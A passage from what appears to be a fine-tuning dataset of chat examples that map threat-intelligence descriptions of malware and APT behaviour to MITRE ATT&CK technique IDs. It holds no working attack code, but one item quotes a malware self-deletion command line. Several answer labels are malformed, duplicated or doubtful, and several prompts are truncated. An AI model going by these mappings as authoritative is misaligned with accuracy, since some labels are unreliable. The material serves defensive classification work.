- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Prior to execution of any recon command to gather information from the target machine, the default codepage of the console is changed to “65001” (utf-8"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Remsec can obtain information about network configuration, including the routing table, ARP cache, and DNS cache."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ferocious Kitten is an APT group that since at least 2015 has been targeting Persian-speaking individuals who appear to be based in Iran. Although it has been active for a long time, the group has mostly operated under the radar and has not been covered by security researchers to the best of our knowledge. It is only recently that it drew attention when a lure document was uploaded to VirusTotal and went public thanks to researchers on Twitter. Since then, one of its implants has been analyzed by a Chinese threat intelligence firm"
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lazarus Group malware SHARPKNOT overwrites and deletes the Master Boot Record (MBR) on the victim's machine and has possessed MBR wiper malware since at least 2009."
- },
- {
- "role": "assistant",
- "content": "T1561.002 - Disk Structure Wipe"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "zwShell can launch command-line shells."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TA551 has used mshta.exe to execute malicious payloads."
- },
- {
- "role": "assistant",
- "content": "T1218.005 - Signed Binary Proxy Execution: Mshta"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "There is a command ftpversion that uploads the version of the backdoor (hardcoded) to a file `ver.txt` on the FTP server, in the root folder for the target."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter', 'T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Linfo creates a backdoor through which remote attackers can obtain data from local systems."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The payload then sets EIP to the entry point of the newly injected code using the SetThreadContext API, and finally calls the NtAlertResumeThread API function to run the injected code"
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API', 'T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT41 leveraged code-signing certificates to sign malware when targeting both gaming and non-gaming organizations."
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QakBot can identify the system time on a targeted host."
- },
- {
- "role": "assistant",
- "content": "T1124 - System Time Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Earth Lusca has used Nltest to obtain information about domain controllers."
- },
- {
- "role": "assistant",
- "content": "T1482 - Domain Trust Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can capture desktop screenshots in the PNG format and send them to the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT41 gained access to production environments where they could inject malicious code into legitimate, signed files and widely distribute them to end users."
- },
- {
- "role": "assistant",
- "content": "T1195.002 - Compromise Software Supply Chain"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "AADInternals can send phishing emails containing malicious links designed to collect users’ credentials."
- },
- {
- "role": "assistant",
- "content": "T1598.003 - Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "REvil can encrypt files on victim systems and demands a ransom to decrypt the files."
- },
- {
- "role": "assistant",
- "content": "T1486 - Data Encrypted for Impact"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Empire contains a variety of enumeration modules that have an option to use API calls to carry out tasks."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The encrypted file contains a config file of 0x78 bytes. The data is decrypted with an 0xD9 XOR operation."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Strike includes a capability to modify the \"beacon\" payload to eliminate known signatures or unpacking methods."
- },
- {
- "role": "assistant",
- "content": "T1027.005 - Indicator Removal from Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HermeticWiper can disable pop-up information about folders and desktop items and delete Registry keys to hide malicious services."
- },
- {
- "role": "assistant",
- "content": "T1070 - Indicator Removal on Host"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SILENTTRINITY can use `System.Security.AccessControl` namespaces to retrieve domain user information."
- },
- {
- "role": "assistant",
- "content": "T1087.002 - Account Discovery: Domain Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "menuPass has used tcping.exe, similar to Ping, to probe port status on systems of interest."
- },
- {
- "role": "assistant",
- "content": "T1046 - Network Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ran a reverse shell with Meterpreter."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "gathers the victim's IP address and domain information, and then sends it to its C2 server."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ZxShell has a feature to capture a remote computer's keystrokes using a keylogger."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can obtain information about the logged on user both locally and for Remote Desktop sessions."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OSX_OCEANLOTUS.D uses Word macros for execution."
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Goopy has the ability to exfiltrate documents from infected systems."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LightNeuron is controlled via commands that are embedded into PDFs and JPGs using steganographic methods."
- },
- {
- "role": "assistant",
- "content": "T1001.002 - Data Obfuscation via Steganography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Stealth Falcon malware gathers the registered user and primary owner name via WMI."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TeamTNT targets exposed Docker API to deploy malicious images. Docker images containing TeamTNT malware are being hosted in public Docker repos via account takeovers. TeamTNT leverages exposed Docker hub secrets within GitHub to stage malicious Docker images. The following MITRE ATT&CK techniques were observed: Deploy Container (T1610), User Execution: Malicious Image (T1204.003), Unsecured Credentials: Credentials In Files (T1552.002), Implant Internal Image (T1525), and Valid Accounts: Cloud Accounts (T1078.004"
- },
- {
- "role": "assistant",
- "content": "T1204.003 - User Execution: Malicious Image"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Koadic can use WMI to execute commands."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Magic Hound malware can list running processes."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PowerSploit's \"New-UserPersistenceOption\" Persistence argument can be used to establish via the \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" Registry key."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "gathers information on users."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Uses Mimikatz to harvest credentials."
- },
- {
- "role": "assistant",
- "content": "T1003.001 - OS Credential Dumping: LSASS Memory', 'T1003.001 - OS Credential Dumping: LSASS Memory"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation Wocao, threat actors created services on remote systems for execution purposes."
- },
- {
- "role": "assistant",
- "content": "T1569.002 - System Services: Service Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Koadic can use mshta to serve additional payloads and to help schedule tasks for persistence."
- },
- {
- "role": "assistant",
- "content": "T1218.005 - Signed Binary Proxy Execution: Mshta"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The first way in which the malware can be launched is by hijacking a DLL. Being placed in the same folder as explorer.exe, the wrapper DLL is loaded during the Windows startup into the Windows Explorer process instead of the legitimate library located in the %windir%\\system32 folder"
- },
- {
- "role": "assistant",
- "content": "T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BlackMould has the ability to download files to the victim's machine."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT28 has collected files from network shared drives."
- },
- {
- "role": "assistant",
- "content": "T1039 - Data from Network Shared Drive"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Anchor can terminate itself if specific execution flags are not present."
- },
- {
- "role": "assistant",
- "content": "T1480 - Execution Guardrails"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has functionality to remove Registry Run key persistence as a cleanup procedure."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "saves itself as a file named msdtc.exe, which is also the name of the legitimate Microsoft Distributed Transaction Coordinator service."
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "establishes by infecting the Security Accounts Manager (SAM) DLL to load a malicious DLL dropped to disk."
- },
- {
- "role": "assistant",
- "content": "T1547.008 - Boot or Logon Autostart Execution: LSASS Driver"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Darkhotel has used malware that is disguised as a Secure Shell (SSH) tool."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Helminth can download additional files."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT32 has infected victims by tricking them into visiting compromised watering hole websites."
- },
- {
- "role": "assistant",
- "content": "T1189 - Drive-by Compromise"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ebury has encoded C2 traffic in hexadecimal format."
- },
- {
- "role": "assistant",
- "content": "T1132.001 - Data Encoding: Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Most of the strings in are encrypted with an XOR-based algorithm; some strings are also encrypted with 3DES and reversed. API function names are also reversed, presumably to avoid detection in memory."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT41 malware TIDYELF loaded the main WINTERLOVE component by injecting it into the iexplore.exe process."
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It implements a simple custom-built virtual machine mechanism that will execute an embedded bytecode to decode and inject the payload into memory"
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "collects information from the victim, including installed drivers, programs previously executed by users, programs and services configured to automatically run at startup, files and folders present in any user's home folder, files and folders present in any user's My Documents, programs installed to the Program Files folder, and recently accessed files, folders, and programs."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Aquatic Panda has downloaded additional scripts and executed Base64 encoded commands in PowerShell."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "IcedID has used WMI to execute binaries."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Appendix A – PLAINTEE older variant Older variants of PLAINTEE can be identified via the unique mutex created during runtime. At least three variants of PLAINTEE have been identified to date, however, the following two samples have additional unique differences"
- },
- {
- "role": "assistant",
- "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT29 collected emails from specific individuals, such as executives and IT staff, using \"New-MailboxExportRequest\" followed by \"Get-MailboxExportRequest\"."
- },
- {
- "role": "assistant",
- "content": "T1114.002 - Email Collection: Remote Email Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OilRig has used macros to verify if a mouse is connected to a compromised machine."
- },
- {
- "role": "assistant",
- "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Meteor has the ability to change the password of local users on compromised hosts and can log off users."
- },
- {
- "role": "assistant",
- "content": "T1531 - Account Access Removal"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Azorult can encrypt C2 traffic using XOR."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Some Backdoor.Oldrea samples contain a publicly available Web browser password recovery tool."
- },
- {
- "role": "assistant",
- "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "XCSSET uses the \"plutil\" command to modify the \"LSUIElement\", \"DFBundleDisplayName\", and \"CFBundleIdentifier\" keys in the \"/Contents/Info.plist\" file to change how XCSSET is visible on the system."
- },
- {
- "role": "assistant",
- "content": "T1647 - Plist File Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Wizard Spider has used \"AdFind.exe\" to collect information about Active Directory groups and accounts."
- },
- {
- "role": "assistant",
- "content": "T1069.002 - Permission Groups Discovery: Domain Groups"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT40 leverages custom credential theft utilities such as HOMEFRY, a password dumper/cracker used alongside the AIRBREAK and BADFLICK backdoors"
- },
- {
- "role": "assistant",
- "content": "T1003 - OS Credential Dumping"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Furthermore, this group has routinely identified and exploited vulnerable web servers of targeted organizations to install web shells, such as ANTAK and ASPXSPY, and used stolen legitimate credentials to compromise externally facing Outlook Web Access (OWA) resources"
- },
- {
- "role": "assistant",
- "content": "T1505.003 - Server Software Component: Web Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Hildegard has downloaded additional scripts that build and run Monero cryptocurrency miners."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Like many other phishing attacks, in this phishing campaign, Charming Kitten uses a fake SMS (Figure 1) to trick their victims. They send confirmation messages stating ‘Google Account Recovery’ to their targets; they claim these messages are sent by Google and the user must follow the link in the SMS to confirm the identity"
- },
- {
- "role": "assistant",
- "content": "T1598.003 - Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PipeMon has stored its encrypted payload in the Registry."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The use of the choice command, as seen below, did not appear in previous versions of OopsIE and appears to have been added in the most recent version used in this attack. cmd.exe /C choice /C Y /N /D Y /T 2 & Del After sleeping, the Trojan will create a GUID and write it to %APPDATA%\\Windows\\GDI.bin. With the Trojan moved its final location, it will then create a scheduled task to run a VBScript to make sure it runs persistently. The Trojan accesses two resources, named Sch and VBS that contains obfuscated strings that contain the command to create the scheduled task and the VBScript to run. This differs from the previous OopsIE variant that used a hardcoded task name for the scheduled task. This process ultimately attempts to run the Trojan every three minutes, which is important as OopsIE relies on this scheduled task as it does not include a main loop to continue its execution. After creating this scheduled task for persistence, the Trojan will begin communicating with its C2 server. The process in which the Trojan communicates with its C2 server is very similar to the previous OopsIE Trojan that we discussed in our previous blog. Also, the oops string used to signify and erroneous transmission from the C2, which gave OopsIE its name is reversed to spoo. The command handler in this OopsIE variant is very similar to the previous version, as it contains the same three (1, 2 and 3) commands seen in Table 2"
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT3 has been known to use \"-WindowStyle Hidden\" to conceal PowerShell windows."
- },
- {
- "role": "assistant",
- "content": "T1564.003 - Hide Artifacts: Hidden Window"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "captured screenshots and sent them out to a C2 server."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Character Description 0 File contains batch commands, it executes the batch commands 1 Rename the temporary file as .ps1 extension 2 Rename the temporary file as .vbs extension Table 2: BONDUPDATER Actions Figure 8 is a screenshot of BONDUPDATER’s DGA implementation"
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter', 'T1064 - Scripting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used keylogging tools."
- },
- {
- "role": "assistant",
- "content": "T1056 - Input Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
